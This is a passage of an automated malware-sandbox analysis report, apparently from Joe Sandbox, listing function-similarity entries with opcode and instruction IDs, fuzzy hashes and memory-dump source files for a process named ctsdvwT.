                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b205eaafe9bbdc5b6a48354324c3612aadac6153e599895a9254b39230d4383
                                        • Instruction ID: a6fea579809e8fe07e33c68e3318640d01e82870a0516ccf7b3007246536e4a5
                                        • Opcode Fuzzy Hash: 6b205eaafe9bbdc5b6a48354324c3612aadac6153e599895a9254b39230d4383
                                        • Instruction Fuzzy Hash: 6B41FEB4D01349DFDB14DFA9C484ADEBBF5FF48310F24842AE819AB250DB75A946CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3971e1c874ee3d955a07925fa1718403073306d5df4417f1a1225029ed65d570
                                        • Instruction ID: 4b344c21bb7bb5bf65b1d91db28308efad3dab653fa64999ac059d5d8bca2171
                                        • Opcode Fuzzy Hash: 3971e1c874ee3d955a07925fa1718403073306d5df4417f1a1225029ed65d570
                                        • Instruction Fuzzy Hash: DB314C34701215DFDF68EB78D9546AEB7F6AF89241F1404B8D441AB390DB3B9C02CBA6
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c03c510ea9d428d7143b95b89d7f5c7054de508482d2477bde9d30b79fe7180c
                                        • Instruction ID: 24fe3a5710f857e31ded0a22b9a07bce5b9a3c11b81c0a322863dbd2a60c9c0d
                                        • Opcode Fuzzy Hash: c03c510ea9d428d7143b95b89d7f5c7054de508482d2477bde9d30b79fe7180c
                                        • Instruction Fuzzy Hash: 6531DF31E0120A9BCB15EF68D89069EF7F6FF89304F54C51AE845EB341DB719846CB81
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eaf138e3cccc92bd6705c39bb58791069aa1462477212ba782c60dd0f4e3b53c
                                        • Instruction ID: 99c45f6a4927d0f646d271b5d4e7d3a1de53028420a6384e0b6a5519e05b6f9f
                                        • Opcode Fuzzy Hash: eaf138e3cccc92bd6705c39bb58791069aa1462477212ba782c60dd0f4e3b53c
                                        • Instruction Fuzzy Hash: 6021B131E023199BCB15EF64C85059EBBF6EF85300F54C56AE851EB255DB71A845CB40
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 888d011195d714d0c30ccc8621b9922b14535ad3fa23e97ba5420a2f735be090
                                        • Instruction ID: 111b54db671ee8f86eed8fbba3bfbd255aface7def8f824d226f806cf73266d5
                                        • Opcode Fuzzy Hash: 888d011195d714d0c30ccc8621b9922b14535ad3fa23e97ba5420a2f735be090
                                        • Instruction Fuzzy Hash: 4521E230201102ABDB75FB3CF98876A37AAFF85340F144965D489CB256DB2EDC468B91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 084f9c6deee790becbdd1212c6afc394e0f74509d1d8a3e7f686f0cbd7d99114
                                        • Instruction ID: 6b7d3ddbfe21b4fe43313cd40d6f3822c57de2e3cc223cc2e8b6d52834119048
                                        • Opcode Fuzzy Hash: 084f9c6deee790becbdd1212c6afc394e0f74509d1d8a3e7f686f0cbd7d99114
                                        • Instruction Fuzzy Hash: 4921DA706022014BDB78F76CF44832D3799EF46325F1848A5D44AC7782DB299C8A8786
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8f3283fd4b62329aec7622f85108d542f0f43f4d2215cf95edf6c50e5cba17f
                                        • Instruction ID: baa9b88d38ad9daf811566ced4e8d912d167edc1cdc7dc03fd17882d521dfbf5
                                        • Opcode Fuzzy Hash: f8f3283fd4b62329aec7622f85108d542f0f43f4d2215cf95edf6c50e5cba17f
                                        • Instruction Fuzzy Hash: E0218B31E0120A9BCB15DFA8D99069EF7B6FF89314F54C61AE845AB240DB719886CB80
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4180819262.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_157d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 307bb08e9cc6a56bfe202b23f81e83d07cb8eccf13a91854fff7212c206c74c8
                                        • Instruction ID: df662ccd6b639bddbd21f8e19e19d177fbf48d68d7b5bd4544c354f3ac514fd3
                                        • Opcode Fuzzy Hash: 307bb08e9cc6a56bfe202b23f81e83d07cb8eccf13a91854fff7212c206c74c8
                                        • Instruction Fuzzy Hash: 9A210075604240DFDB16DF54E980B26BBB1FF84314F20C96DD80A4F242D33AD407CA62
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ddea0fa8cf916b8c28d16c576e2528168e0b9bb2f276fdb01bd0d3c377627de
                                        • Instruction ID: acbfca573afe0e7cd027beae9b1b9f1ca178c4c6d67c2db04c7bfc3c65c40153
                                        • Opcode Fuzzy Hash: 4ddea0fa8cf916b8c28d16c576e2528168e0b9bb2f276fdb01bd0d3c377627de
                                        • Instruction Fuzzy Hash: 67212734701205CFDB64EB78D958AADBBF1EF89304B1404A8E446EB3A5DB369D05CB91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5944d5fa9b7bbb7dfcf269b5b9a126ba564dc48683740fb8d06326691efe2fb
                                        • Instruction ID: b0f060b82a21f5411e5be7888d995ccb01ddc75598e4db8991a22566b63aba19
                                        • Opcode Fuzzy Hash: f5944d5fa9b7bbb7dfcf269b5b9a126ba564dc48683740fb8d06326691efe2fb
                                        • Instruction Fuzzy Hash: B8213234701215DFDB68FB78D55569E77F5AF89240F1404B8C186EB390DB369D02CBA2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a341bd16f90f0e906b0c4aec6fc22249f8c81c2d9ffafed1b06e9ade0ab5537
                                        • Instruction ID: f2f207070c39a8e07e196a7e4a28e709b9e537189b4c9e1bc6b0dcfe3c8ef751
                                        • Opcode Fuzzy Hash: 5a341bd16f90f0e906b0c4aec6fc22249f8c81c2d9ffafed1b06e9ade0ab5537
                                        • Instruction Fuzzy Hash: AF217C31E01209DBCB18DFA4C45059EB7F6AF89304F54C62AE855FB354EB71A845CB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8ab32f4161f52ae4689110bf365683d8ab817f4fa5aca227a2ccadf856aa611
                                        • Instruction ID: aa9baec5dfcb5eec6fb0a48b7a05c034f498e45c88b3352d466d587c92c82be5
                                        • Opcode Fuzzy Hash: d8ab32f4161f52ae4689110bf365683d8ab817f4fa5aca227a2ccadf856aa611
                                        • Instruction Fuzzy Hash: AB21CF30301102ABEB75FB38F88875A33AAFB88344F045A64D449C7255DB3E9C468B91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36468efb2dc3ed8c6c6c35296f441b5e8e06f43f6f1515816ee0c46b28b945e4
                                        • Instruction ID: c0d43d8de6eaaed4795edcb0bfe849e5c0338ecd0d2f1fa9055741a4e89f175c
                                        • Opcode Fuzzy Hash: 36468efb2dc3ed8c6c6c35296f441b5e8e06f43f6f1515816ee0c46b28b945e4
                                        • Instruction Fuzzy Hash: AF216034B01215DFDB68EB38D5556AEB7F5AF49340F1404A8C186EB390DB369C02CBA2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3592e6adc691f6734091e9de6a6bac2a01cada3d424cfa26bb12af6029636e7d
                                        • Instruction ID: e1146ed4fdd73fc594cd93062fc4487e4bdec8dac476e06722538d29559cd291
                                        • Opcode Fuzzy Hash: 3592e6adc691f6734091e9de6a6bac2a01cada3d424cfa26bb12af6029636e7d
                                        • Instruction Fuzzy Hash: 5A211634701205CFDB64EB78D958AAEB7F1EF89204B1004A8E446EB3A0DB369D05CBA1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4180819262.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_157d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 995c5e78081a2af74cb34dbdb397716b598aea86208d1632702c71d5c884642c
                                        • Instruction ID: 00b1c1e461fb2aa231e1515e430ff839490efe73cc400a96fb4225648585f6d8
                                        • Opcode Fuzzy Hash: 995c5e78081a2af74cb34dbdb397716b598aea86208d1632702c71d5c884642c
                                        • Instruction Fuzzy Hash: 0A2168755093808FCB03CF24D990B15BF71BF46214F28C5EAD8498F6A7D33A980ACB62
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d14e70a9c2bd7266586e1915e5c6580e1ee2f958071190fe5cd21d7b7c1bc86d
                                        • Instruction ID: d0f17b5031f3ed723c3471442ab4586b0332940894a41a5cde0c2a4a6c5f3d16
                                        • Opcode Fuzzy Hash: d14e70a9c2bd7266586e1915e5c6580e1ee2f958071190fe5cd21d7b7c1bc86d
                                        • Instruction Fuzzy Hash: 28114C35A022159FCF65FFB888542AEB7F6AF88210B154479D846EB302E731C8468BA5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f06c36990f6ae23b58d0db41624b1259ac6e422c803db2aa7e466138ff7acdaf
                                        • Instruction ID: ebfbc75db084627ed8a4c27579fa722b3c9a67e8778c1a1674868e9041bf7706
                                        • Opcode Fuzzy Hash: f06c36990f6ae23b58d0db41624b1259ac6e422c803db2aa7e466138ff7acdaf
                                        • Instruction Fuzzy Hash: 50116330702206EBEFA4F779D81836972D9FB85214F148D69D4C6CF241DA25CCD98BC1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d923a2c21027223da2937a6103f39d9b28f228054f5c917c8b48dc533a9e22a
                                        • Instruction ID: 434faee56d22d4bd12981675d9a35ebef325cef5e63737dab8b11258734e090a
                                        • Opcode Fuzzy Hash: 2d923a2c21027223da2937a6103f39d9b28f228054f5c917c8b48dc533a9e22a
                                        • Instruction Fuzzy Hash: DA1125B6F00215DBCB64EB78A80D65F7BEAFF48254F150865E945D3340EB3AC8068791
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6727defbc57e706730b2ba2cc84da195fa7cf2f1453b57a5c080d3af4f95c794
                                        • Instruction ID: e00f208a9f14480cf3bb54e37db719c9c4bb1f0bdcf1c19b6481c507129bfc8e
                                        • Opcode Fuzzy Hash: 6727defbc57e706730b2ba2cc84da195fa7cf2f1453b57a5c080d3af4f95c794
                                        • Instruction Fuzzy Hash: 1611A730B02206EBEFA4F775D80836972D9E785214F248C7AD4C6CF242EA25C8D98BC1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16a7fdf365f0bd1116d08c7708c6d3986de2511fd7469f87b8fc3f452587af05
                                        • Instruction ID: fc40469e2572dc571137fbbdfe4c643e2d3dd84e62daf11df725ab2ae6839ddd
                                        • Opcode Fuzzy Hash: 16a7fdf365f0bd1116d08c7708c6d3986de2511fd7469f87b8fc3f452587af05
                                        • Instruction Fuzzy Hash: C6016D35A02215DFCF65FFB984542AEBBF5EF88210B144479D84AEB301E735C8428BD5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32370909ece89f65132f7ca98e4efb5efd3c3ae255f2eee72ba5290ddd887bf4
                                        • Instruction ID: 02a46c3daab0b3001f4a428b453bfb33a65eb94c01669f7c30b00a0f4b7e90b0
                                        • Opcode Fuzzy Hash: 32370909ece89f65132f7ca98e4efb5efd3c3ae255f2eee72ba5290ddd887bf4
                                        • Instruction Fuzzy Hash: 4A01B130A002058BDB14FF95D984B9AB7B6FFC5710F548264D84C6F29AEBB0E905CBA1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2dd13e24ccdbbdd79c13c38f22da4e47625e312a360f48fb4d571cd678b8cac
                                        • Instruction ID: b7ef3dcdc26a2889a6a8c69120d6edaf3c1d04cd3c647316ec2115747b477925
                                        • Opcode Fuzzy Hash: f2dd13e24ccdbbdd79c13c38f22da4e47625e312a360f48fb4d571cd678b8cac
                                        • Instruction Fuzzy Hash: F4018430A0134AEFDB01FBB8FD9455D7BF1FB85300B1051A9C4089B195DA371E089792
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa4311071359ccf61b4d00fdd253815a8174d4025681d6fd5db56c5fc09c189f
                                        • Instruction ID: e638be6ad370d8b9cd8a6ba92a1a07b1debb29885f2f36fe7ca1ad8e88528e25
                                        • Opcode Fuzzy Hash: aa4311071359ccf61b4d00fdd253815a8174d4025681d6fd5db56c5fc09c189f
                                        • Instruction Fuzzy Hash: F4F0F677A07210DBD716EBA494501ACBBB1EE881117184097D886DF712D335D447C751
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 760f22181d445bcbc437bf17ab8ed74451382f09a3642062fbe396468585780e
                                        • Instruction ID: fe7ee15d81831942612e02a1aa78270cb65a52f3261b007119d3323f3c4bca96
                                        • Opcode Fuzzy Hash: 760f22181d445bcbc437bf17ab8ed74451382f09a3642062fbe396468585780e
                                        • Instruction Fuzzy Hash: 68F0EC30A0020BEFDB44FBB8FD8859D77F6FB84700F505668C4099B254EB3A6E598B91
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                        • Instruction ID: 81ab298347eb9e860b90675895e5ec79a32111b8757850d2939de25e8a85250c
                                        • Opcode Fuzzy Hash: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                        • Instruction Fuzzy Hash: DCC012363140504F8501E728E0544B837B1DBCA1293140096D144CF322CE125802CB00